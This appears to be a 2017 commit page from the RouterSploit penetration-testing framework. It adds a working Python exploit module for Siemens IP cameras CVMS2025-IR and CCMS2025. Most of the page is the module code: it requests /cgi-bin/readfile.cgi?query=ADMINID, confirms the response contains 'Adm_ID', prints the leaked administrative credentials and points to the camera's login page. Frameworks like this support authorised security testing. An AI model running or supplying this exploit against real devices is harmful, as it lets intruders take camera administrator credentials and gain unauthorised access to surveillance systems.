SIEMENS IP-Camera CVMS2025-IR / CCMS2025 - Credentials Disclosure (#296)

* add wdr842nd_wdr842n_configure_disclosure * fix pep8 * fix pep8 * fix pep8 * fix logic error * improve vulnerability verify * add CVMS2025_credentials_disclosure.py * add CVMS2025_credentials_disclosure.py * add __init__.py

SIEMENS IP-Camera CVMS2025-IR / CCMS2025 - Credentials Disclosure (#296)
* add wdr842nd_wdr842n_configure_disclosure * fix pep8 * fix pep8 * fix pep8 * fix logic error * improve vulnerability verify * add CVMS2025_credentials_disclosure.py * add CVMS2025_credentials_disclosure.py * add __init__.py
9d706265 · 菜猫 · Marcin Bury · e8266ada · 9d706265 · 9d706265
Commit 9d706265 authored Aug 26, 2017 by 菜猫 Committed by Marcin Bury Aug 26, 2017
Showing with 59 additions and 0 deletions

CVMS2025_credentials_disclosure.py ...ploits/cameras/siemens/CVMS2025_credentials_disclosure.py +59 -0

__init__.py routersploit/modules/exploits/cameras/siemens/__init__.py +0 -0

No files found.
--- a/routersploit/modules/exploits/cameras/siemens/CVMS2025_credentials_disclosure.py
+++ b/routersploit/modules/exploits/cameras/siemens/CVMS2025_credentials_disclosure.py
+from routersploit import (
+    exploits,
+    print_error,
+    print_info,
+    print_success,
+    http_request,
+    mute,
+    validators
+)
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for SIEMENS IP-Camera CCMS2025 Password Dislosure vulnerability.
+    If target is vulnerable it is possible to read administative credentials.
+    """
+    __info__ = {
+        'name': 'SIEMENS IP-Camera CCMS2025 Password Disclosure',
+        'description': 'Module exploits SIEMENS IP-Camera CCMS2025 Password Dislosure vulnerability. If target is vulnerable '
+                       'it is possible to read administrative credentials',
+        'authors': [
+            'Yakir Wizman',  # vulnerability discovery
+            'VegetableCat <yes-reply[at]linux.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/40254/',
+        ],
+        'devices': [
+            'SIEMENS IP-Camera CVMS2025-IR',
+            'SIEMENS IP-Camera CCMS2025',
+        ],
+    }
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1',
+                             validators=validators.url)  # target address
+    port = exploits.Option(80, 'Target port')  # default port
+    def __init__(self):
+        self.content = None
+    def run(self):
+        if self.check():
+            print_success("Target seems to be vulnerable")
+            print_info(self.content)
+            print_info("please login at:")
+            print_info("{}:{}/cgi-bin/chklogin.cgi".format(self.target, self.port))
+        else:
+            print_error("Exploit failed - target seems to be not vulnerable")
+    @mute
+    def check(self):
+        url = "{}:{}/cgi-bin/readfile.cgi?query=ADMINID".format(self.target, self.port)
+        response = http_request(method="GET", url=url)
+        if response is not None and "Adm_ID" in response.text:
+            self.content = response.text
+            return True  # target is vulnerable
+        return False  # target is not vulnerable
--- a/routersploit/modules/exploits/cameras/siemens/__init__.py
+++ b/routersploit/modules/exploits/cameras/siemens/__init__.py